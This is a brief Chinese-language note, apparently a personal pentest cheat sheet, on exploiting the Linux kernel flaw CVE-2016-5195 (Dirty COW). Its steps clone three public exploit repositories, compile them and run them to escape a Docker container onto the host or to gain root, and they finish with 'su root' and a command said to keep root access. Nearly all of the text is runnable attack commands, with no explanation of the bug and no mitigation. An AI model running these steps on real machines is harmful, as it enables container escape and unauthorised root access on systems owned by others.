【笔记】CVE-2016-5195漏洞利用
前言
CVE-2016-5195漏洞利用
Docker容器逃逸
- 通过scumjr/dirtycow-vdso实现由内核引起的Docker容器逃逸漏洞利用
下载项目
1 | git clone https://github.com/scumjr/dirtycow-vdso.git |
下载依赖
Debian
1 | apt install nasm |
编译exp
1 | make |
执行exp
1 | ./0xdeadbeef |
- 此时执行的命令,在真机上也会被执行
Linux提权
- 利用gbonacini/CVE-2016-5195的DirtyCow脏牛项目,实现Linux提权
下载项目
1 | git clone https://github.com/gbonacini/CVE-2016-5195.git |
编译
1 | make |
漏洞利用
1 | ./dcow |
提权
1 | su root |
Linux提权
- 利用sqlnetcat/dirtycow-mem的脏牛项目,实现Linux提权
下载项目
1 | git clone https://github.com/sqlnetcat/dirtycow-mem.git |
编译项目
1 | gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread |
漏洞利用
1 | ./dirtycow-mem |
保持root权限
1 | echo 0 > /proc/sys/vm/dirty_writeback_centisecs |